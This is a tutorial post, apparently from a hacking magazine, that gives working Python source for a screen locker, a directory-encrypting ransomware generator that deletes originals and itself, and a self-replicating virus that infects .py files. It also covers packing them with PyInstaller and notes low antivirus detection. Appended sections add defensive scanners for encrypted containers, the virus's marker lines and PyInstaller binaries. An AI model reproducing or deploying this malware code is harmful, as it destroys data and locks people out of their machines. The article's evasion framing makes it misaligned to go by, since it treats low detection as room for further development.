Poisonous python. Writing the simplest malware in Python: a locker, ransomware, and a virus
Posted by Plotu:

The content of the article
- Setting up the environment
- Locker
- Encryptor
- Virus
- Making an executable file
- Conclusion

Why would anyone write malware in Python? We do it here to learn the general principles of malware development; along the way you get practice with the language and can apply what you learn elsewhere. Besides, Python malware does turn up in the wild, and not every antivirus pays attention to it.

Most often Python is used to write backdoors that download and execute arbitrary code on an infected machine. In 2017 Dr.Web analysts discovered Python.BackDoor.33, and on May 8, 2019 Mac.BackDoor.Siggen.20 was spotted. Another trojan, RAT Python, stole user data from infected devices and used Telegram as its exfiltration channel.

We will write three demo programs in Python: a locker that blocks access to the computer until the user enters the correct password, an encryptor that walks directories and encrypts every file in them, and a virus that spreads its own code by infecting other programs.

INFO
Remote administration of infected machines is beyond the scope of this article; you will find a basic code base with full explanations in the article "Reverse shell in Python".

Although our creations make no claim to technical sophistication, under certain conditions they can do real damage. So be warned: disrupting other people's computers and destroying data carries severe penalties. Let's agree up front: you run everything described here only on your own machine, and even then take care not to encrypt your whole disk by accident.

Setting up the environment

First of all we need Python itself, version 3. I won't describe the installation in detail; instead I'll point you to the free book "A Byte of Python" (PDF), which answers this and many other Python questions.

Next we install the third-party modules we will use:

Code:
    pip install pyAesCrypt
    pip install pyautogui

tkinter is not installed with pip: it is part of the standard library and ships with the official Windows and macOS installers; on Debian/Ubuntu it comes from the python3-tk package. That completes the preparation; on to the code.

Locker

The idea is to create a full-screen window and stop the user from closing it.

Import the libraries:

Code:
    import pyautogui
    from tkinter import Tk, Entry, Label
    from pyautogui import click, moveTo
    from time import sleep

Now the main part of the program. The loop at the end calls on_closing(), which in turn binds callback(); both functions are shown further down, but in the finished script their definitions must come before this loop.

Code:
    # Create a window
    root = Tk()
    # Disable pyautogui's fail-safe (the upper left corner of the screen)
    pyautogui.FAILSAFE = False
    # Get the screen width and height
    width = root.winfo_screenwidth()
    height = root.winfo_screenheight()
    # Set the window title
    root.title('From "Xakep" with love')
    # Open the window in full screen
    root.attributes("-fullscreen", True)
    # Create an input field and set its size and position
    entry = Entry(root, font=1)
    entry.place(width=150, height=50, x=width / 2 - 75, y=height / 2 - 25)
    # Create text labels and set their position
    label0 = Label(root, text="╚(•⌂•)╝ Locker by Xakep (╯°□°)╯︵ ┻━┻", font=1)
    label0.grid(row=0, column=0)
    label1 = Label(root, text="Write the password and press Ctrl + C", font='Arial 20')
    label1.place(x=width / 2 - 75 - 130, y=height / 2 - 25 - 100)
    # Redraw the window and pause
    root.update()
    sleep(0.2)
    # Click the centre of the window
    click(width / 2, height / 2)
    # Reset the key flag
    k = False
    # Keep re-locking the screen until the correct key has been entered
    while not k:
        on_closing()

Here pyautogui.FAILSAFE = False disables pyautogui's fail-safe: by default, moving the cursor into the upper left corner of the screen raises an exception and ends the program. We don't want that, so we switch it off.

To make the locker work on any monitor at any resolution, we read the screen width and height and use simple arithmetic to decide where the cursor goes, where to click, and so on. In our case the cursor lands in the centre of the screen, i.e. width and height divided by two. The sleep() pause gives the user a chance to type the cancel code.

So far we have not blocked keyboard input, but that can be done too, and then the user has no way to get rid of us. I don't advise doing it straight away: first get the program to exit when the password is entered. For reference, the code that hooks the keyboard and mouse looks like this (pyHook is Windows-only, and uMad is the event handler, which the article does not show):

Code:
    import pythoncom, pyHook

    hm = pyHook.HookManager()
    hm.MouseAll = uMad
    hm.KeyAll = uMad
    hm.HookMouse()
    hm.HookKeyboard()
    pythoncom.PumpMessages()

Now the function that checks the entered key:

Code:
    def callback(event):
        global k, entry
        if entry.get() == "xakep":
            k = True

Simple enough: if the key is not the one we set, the program keeps running; if the passwords match, we stop. Note that the password sits in the script in clear text, so anyone who can read the source (or run strings on the packed executable) can recover it.

The last function the window needs:

Code:
    def on_closing():
        # Click the centre of the screen
        click(width / 2, height / 2)
        # Move the mouse cursor to the centre of the screen
        moveTo(width / 2, height / 2)
        # Switch full-screen mode back on
        root.attributes("-fullscreen", True)
        # When the window manager asks the window to close (close button, Alt+F4), call on_closing again;
        # killing the process from the task manager is not intercepted by this
        root.protocol("WM_DELETE_WINDOW", on_closing)
        # Redraw the window
        root.update()
        # Bind the keyboard shortcut that checks the password
        root.bind('<Control-KeyPress-c>', callback)

With that, our improvised locker is ready.

Encryptor

We will write this one with a single third-party library, pyAesCrypt. The idea is to encrypt every file in a specified directory and in all directories below it. Limiting it to one directory is important: it keeps us from breaking the operating system. We will create two files, an encryptor and a decryptor, and each deletes itself when it has finished.

First we ask for the path of the target directory and the password for encryption and decryption:

Code:
    direct = input("Write the attacked directory: ")
    password = input("Enter password: ")

Next we generate the encryption and decryption scripts. Roughly like this:

Code:
    with open("Crypt.py", "w") as crypt:
        crypt.write('''
        program text
        ''')

On to the files we use as templates. Start with the encryptor. We need two standard libraries:

Code:
    import os
    import sys

The encryption function (all according to the pyAesCrypt manual):

Code:
    def crypt(file):
        import pyAesCrypt
        print('-' * 80)
        # Set the password and the buffer size
        password = "''' + str(password) + '''"
        buffer_size = 512 * 1024
        # Call the encryption function
        pyAesCrypt.encryptFile(str(file), str(file) + ".crp", password, buffer_size)
        print("[Encrypt] '" + str(file) + ".crp'")
        # Delete the original file
        os.remove(file)

The strange-looking "''' + str(password) + '''" is how the generator splices the password in: the template is itself a triple-quoted string, so ''' closes it, str(password) is concatenated, and ''' reopens it. In the generated Crypt.py the line becomes password = "..." with the literal password between the quotes.

Important nuances. We encrypt and decrypt through a buffer, so each file is processed in chunks of buffer_size bytes instead of being loaded into memory whole; that removes (or at least greatly relaxes) any limit on file size. The os.remove(file) call is needed because encryptFile writes the ciphertext to a new .crp file and leaves the original in place; you can keep the original instead of deleting it if you prefer.

Now the function that walks folders. Nothing complicated here either.

Code:
    def walk(dir):
        # Loop over everything in the given folder
        for name in os.listdir(dir):
            path = os.path.join(dir, name)
            # If it's a file, encrypt it
            if os.path.isfile(path):
                crypt(path)
            # If it's a folder, recurse into it
            else:
                walk(path)

Two more lines at the end: one starts the walk, the other makes the script delete itself.

Code:
    walk("''' + str(direct) + '''")
    os.remove(str(sys.argv[0]))

The target path is substituted here in the same way as the password. Self-deletion works for a .py script because the interpreter has already read it; on Windows a running executable is locked, so the packed .exe from the last section cannot remove itself this way.

Here is the whole source.

Code:
    import os
    import sys

    def crypt(file):
        import pyAesCrypt
        print('-' * 80)
        password = "''' + str(password) + '''"
        buffer_size = 512 * 1024
        pyAesCrypt.encryptFile(str(file), str(file) + ".crp", password, buffer_size)
        print("[Encrypt] '" + str(file) + ".crp'")
        os.remove(file)

    def walk(dir):
        for name in os.listdir(dir):
            path = os.path.join(dir, name)
            if os.path.isfile(path):
                crypt(path)
            else:
                walk(path)

    walk("''' + str(direct) + '''")
    print('-' * 80)
    os.remove(str(sys.argv[0]))

Now the mirror image. Where the encryptor calls encryptFile, the decryptor calls decryptFile. There is no point going through the same lines again, so here is the final version straight away.

Code:
    import os
    import sys

    # Decryption function
    def decrypt(file):
        import pyAesCrypt
        print('-' * 80)
        password = "''' + str(password) + '''"
        buffer_size = 512 * 1024
        # Strip the .crp extension to get the original name
        pyAesCrypt.decryptFile(str(file), str(os.path.splitext(file)[0]), password, buffer_size)
        print("[Decrypt] '" + str(os.path.splitext(file)[0]) + "'")
        os.remove(file)

    # Directory traversal
    def walk(dir):
        for name in os.listdir(dir):
            path = os.path.join(dir, name)
            if os.path.isfile(path):
                try:
                    decrypt(path)
                except Exception:
                    pass
            else:
                walk(path)

    walk("''' + str(direct) + '''")
    print('-' * 80)
    os.remove(str(sys.argv[0]))

29 lines in total, of which only three do the decrypting. In case a file turns out to be damaged and raises an error, we catch the exception (try...except) and simply skip that file. The handler must catch Exception (or the ValueError that pyAesCrypt raises for a wrong password or a corrupted file): the name Error used in the original listing does not exist, so the first failure would have ended with a NameError instead of being skipped.

Virus

The idea is a program that infects other programs with a given extension. Unlike real viruses, which infect any executable file, ours infects only other Python programs.

This time no third-party libraries are needed, only the sys and os modules.

Code:
    import sys
    import os

We will write three functions: one that reports the infection, one that walks directories, and the infector itself.

The function that reports the attack:

Code:
    def code(void):
        print("Infected")

Call it straight away so we can see the program has run:

Code:
    code(None)

The directory walk is like the one in the encryptor.

Code:
    def walk(dir):
        for name in os.listdir(dir):
            path = os.path.join(dir, name)
            # If we find a file, check its extension
            if os.path.isfile(path):
                # If the extension is .py, call virus
                if os.path.splitext(path)[1] == ".py":
                    virus(path)
                else:
                    pass
            else:
                # If it's a directory, go into it
                walk(path)

The virus infects files "below" the directory it is running in, so the walk is started from the current directory, obtained with os.getcwd():

Code:
    walk(os.getcwd())

On the first and last line of the file we write these two comments:

Code:
    # START #
    # STOP #

I'll explain why a little later. Everything between them (the imports, the three functions and the call to walk) is the virus body.

Next, the function responsible for self-replication.

Code:
    def virus(python):
        begin = "# START #\n"
        end = "# STOP #\n"
        # Read our own file (the script that is running) and call it copy
        with open(sys.argv[0], "r") as copy:
            # Create a flag
            k = 0
            # Variable for the virus code; start with an empty line
            virus_code = "\n"
            # Go through our own file line by line
            for line in copy:
                # When we find the start marker, raise the flag
                if line == begin:
                    k = 1
                    # Add the marker to the virus code
                    virus_code += begin
                # Past the start but not at the end yet: copy the line
                elif k == 1 and line != end:
                    virus_code += line
                # At the end marker: add it and leave the loop
                elif line == end:
                    virus_code += end
                    break
                else:
                    pass
        # Now read the file we are going to infect
        with open(python, "r") as file:
            # Variable for its source code
            original_code = ""
            # Copy it line by line
            for line in file:
                original_code += line
                # If we meet the start marker the file is already infected: stop and raise vir
                if line == begin:
                    vir = True
                    break
            # The loop finished without finding a marker: lower vir
            else:
                vir = False
        # If vir is down, write the virus followed by the original code
        if not vir:
            with open(python, "w") as paste:
                paste.write(virus_code + "\n\n" + original_code)
        else:
            pass

Now it should be clearer why we need the "start" and "stop" labels: they mark the beginning and end of the virus code. First we read our own file line by line; when we hit the start marker we raise the flag and copy lines until the stop marker. The leading empty line makes the virus start on a new line inside the host's source. Then we read the target file and copy its source line by line, stopping if we meet the start marker (the file is already infected). The last step writes the virus, two blank lines and the original code back into the file. You can play with this and write it in some special way, for example by modifying all the output lines.

Making an executable file

How do you run a virus written in a scripting language on the victim's machine? There are two ways: either make sure somehow that the interpreter is installed there, or pack our creation together with everything it needs into a single executable. The PyInstaller utility does exactly this. Here is how to use it.

Install it:

Code:
    pip install PyInstaller

and run:

Code:
    pyinstaller "filename.py" --onefile --noconsole

After a short wait a bunch of files appears in the program folder (a build directory, a dist directory and a .spec file). You can safely delete everything except the executable, which is in the dist folder.

It is said that ever since malware in Python began to appear, antiviruses have been extremely nervous about PyInstaller, even when it packs a perfectly safe program.

I decided to check what VirusTotal has to say about my creations. Here are the reports:
- Crypt.exe was disliked by 12 out of 72 antiviruses;
- Locker.exe by 10 out of 72;
- Virus.exe by 23 out of 72.

The worst result was Virus.exe: either some antiviruses noticed the self-replication, or they simply didn't like the file name. But as you can see, none of these files alerted every antivirus.

Conclusion

So, we wrote three malicious programs in a scripting language and packaged them with PyInstaller.

Of course, our virus is not the scariest in the world, and the locker and the ransomware still need to be delivered to the victim's machine somehow. None of our programs talks to a C&C server, and I have not obfuscated the code at all, so there is plenty of room for creativity.

Nevertheless, the detection rate turned out to be surprisingly low. It turns out that even the simplest home-made malware can become a threat. So antiviruses are antiviruses, but downloading random programs from the Internet and running them without thinking will always be unsafe.
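An added example for the encryptor section, not code from the article: an incident responder's triage helper that recognises pyAesCrypt output by the AES Crypt container header rather than by the .crp extension, which the attacker chooses and can change. The AES Crypt v2 format starts with the bytes AES, a version byte, a reserved byte and a list of length-prefixed extensions terminated by a zero length; pyAesCrypt records its own name and version in a CREATED_BY extension, a handy indicator of the tooling used. The sample header below is constructed inline (the version string in it is made up), so no real encrypted file is needed, and nothing here can decrypt anything: the key is derived from the password, so this is inventory, not recovery.

```python
import os
import struct

AESCRYPT_MAGIC = b"AES"


def parse_aescrypt_header(data):
    """Parse the start of an AES Crypt container.

    Returns None if the data does not begin with the AES Crypt magic or the
    header is truncated; otherwise a dict with the format version, the
    extensions found in a v2 header and the header length in bytes.
    """
    if len(data) < 5 or data[:3] != AESCRYPT_MAGIC:
        return None
    version = data[3]
    info = {"version": version, "extensions": {}, "header_len": 5}
    if version != 2:
        # v0/v1 containers carry no extension list; report the version and stop.
        return info
    pos = 5
    while True:
        if pos + 2 > len(data):
            return None  # truncated extension list
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        pos += 2
        if length == 0:
            break  # a zero-length extension terminates the list
        raw = data[pos:pos + length]
        if len(raw) < length:
            return None  # truncated extension body
        pos += length
        ident, _, value = raw.partition(b"\x00")
        # pyAesCrypt also writes an all-zero 128-byte padding extension with no
        # identifier; skip anything without one.
        if ident:
            info["extensions"][ident.decode("ascii", "replace")] = value.decode("utf-8", "replace")
    info["header_len"] = pos
    return info


def scan_tree(root):
    """List (path, CREATED_BY tag) for every AES Crypt container under root, whatever its extension."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    head = f.read(4096)
            except OSError:
                continue
            info = parse_aescrypt_header(head)
            if info is not None:
                hits.append((path, info["extensions"].get("CREATED_BY", "")))
    return hits


def build_sample_header():
    """Constructed sample: a v2 header with a CREATED_BY extension, the zero-filled
    padding extension and the terminator, followed by 96 dummy bytes standing in
    for the IV, the encrypted session key and the HMAC."""
    created_by = b"CREATED_BY\x00pyAesCrypt 6.0.0"
    return (AESCRYPT_MAGIC + b"\x02\x00"
            + struct.pack(">H", len(created_by)) + created_by
            + struct.pack(">H", 128) + bytes(128)
            + b"\x00\x00"
            + bytes(96))


if __name__ == "__main__":
    print(parse_aescrypt_header(build_sample_header()))
    print(parse_aescrypt_header(b"just some text"))  # None
```

Point scan_tree() at a suspect directory to get an inventory of containers and their CREATED_BY tags; the function names and dictionary keys are this example's own choices.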
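An added example for the virus section, not part of the article: a scanner that turns the infection mechanism against itself. The virus can only find its own body by the exact # START # and # STOP # lines, so those two lines are a reliable signature for this sample, and removing everything between them (plus the padding newlines the infector adds) restores the host file. The signature is only as good as the markers: a variant that renames them is invisible to this check, which is the general weakness of string signatures. The infected sample in the block is constructed, and all function names are this example's own.

```python
import hashlib
import os

# The exact marker lines the sample virus uses to delimit its own body.
START_MARKER = "# START #\n"
STOP_MARKER = "# STOP #\n"


def extract_infection(text):
    """Split Python source text into (virus block, cleaned host source).

    Returns (None, text) unchanged when the text carries no complete
    START/STOP marker pair.
    """
    lines = text.splitlines(keepends=True)
    try:
        start = lines.index(START_MARKER)
        stop = lines.index(STOP_MARKER, start)
    except ValueError:
        return None, text
    payload = "".join(lines[start:stop + 1])
    before = lines[:start]
    after = lines[stop + 1:]
    # The infector writes "\n" + virus + "\n\n" + original, so peel off exactly
    # that padding and nothing else.
    if before and before[-1] == "\n":
        before = before[:-1]
    for _ in range(2):
        if after and after[0] == "\n":
            after = after[1:]
    return payload, "".join(before + after)


def is_infected(text):
    return extract_infection(text)[0] is not None


def fingerprint(payload):
    """SHA-256 of the virus block, so variants can be clustered across hosts."""
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def scan_tree(root, disinfect=False):
    """Return [(path, fingerprint)] for every .py file under root that carries the markers.

    With disinfect=True the virus block is removed and the host source written back.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".py"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                text = f.read()
            payload, cleaned = extract_infection(text)
            if payload is None:
                continue
            hits.append((path, fingerprint(payload)))
            if disinfect:
                with open(path, "w", encoding="utf-8") as f:
                    f.write(cleaned)
    return hits


if __name__ == "__main__":
    import tempfile
    # Constructed sample: a harmless stand-in for the virus body inside a small host script.
    virus = START_MARKER + "import os\nprint('Infected')\n" + STOP_MARKER
    host = "#!/usr/bin/env python3\nprint('hello')\n"
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.py")
        with open(victim, "w") as f:
            f.write("\n" + virus + "\n\n" + host)
        print(scan_tree(d, disinfect=True))
        with open(victim) as f:
            print(f.read() == host)  # True
```

Run scan_tree() read-only first and review the fingerprints; run it again with disinfect=True only once you are sure every hit is the sample's marker block and not a legitimate file that happens to contain those lines.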
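An added example for the packing section, not from the article: what makes a PyInstaller --onefile binary easy to recognise is the CArchive cookie appended to the bootloader, an 88-byte record that begins with the magic bytes MEI\x0c\x0b\x0a\x0b\x0e and records the archive length, the table-of-contents position and size, the Python version and the name of the Python shared library. Scanners key on exactly this, which is why benign PyInstaller programs pick up detections too. The detector below searches a file's tail for that cookie and parses it. The blob it is tested against is constructed inline, with arbitrary length and version values; the encoding of the version field has changed across PyInstaller releases, so it is reported raw rather than decoded.

```python
import struct
import sys

PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, archive length, TOC offset, TOC length, python version, pylib name
COOKIE = struct.Struct("!8sIIii64s")


def find_pyinstaller_cookie(data):
    """Return a dict describing the last PyInstaller cookie found in data, or None."""
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos == -1 or pos + COOKIE.size > len(data):
        return None
    _, archive_len, toc_off, toc_len, pyvers, pylib = COOKIE.unpack(data[pos:pos + COOKIE.size])
    return {
        "cookie_offset": pos,
        "archive_length": archive_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "pyvers_raw": pyvers,
        "pylib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def is_pyinstaller_file(path, tail_bytes=1 << 20):
    """Check only the last tail_bytes of the file; the cookie sits at the end of the appended archive."""
    with open(path, "rb") as f:
        f.seek(0, 2)
        size = f.tell()
        f.seek(max(0, size - tail_bytes))
        return find_pyinstaller_cookie(f.read()) is not None


def build_sample_blob():
    """Constructed sample: a fake 512-byte 'bootloader' (MZ plus zeros) followed by a cookie.
    The numeric values and the library name are arbitrary."""
    cookie = COOKIE.pack(PYINSTALLER_MAGIC, 4096, 3000, 800, 310, b"python310.dll")
    return b"MZ" + bytes(510) + cookie


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], "pyinstaller" if is_pyinstaller_file(sys.argv[1]) else "no cookie")
    else:
        print(find_pyinstaller_cookie(build_sample_blob()))
```

Once a cookie is found, the archive length and TOC offset tell you where the embedded archive and its entries begin; that is the same layout tools such as pyinstxtractor use to unpack the .pyc files for review.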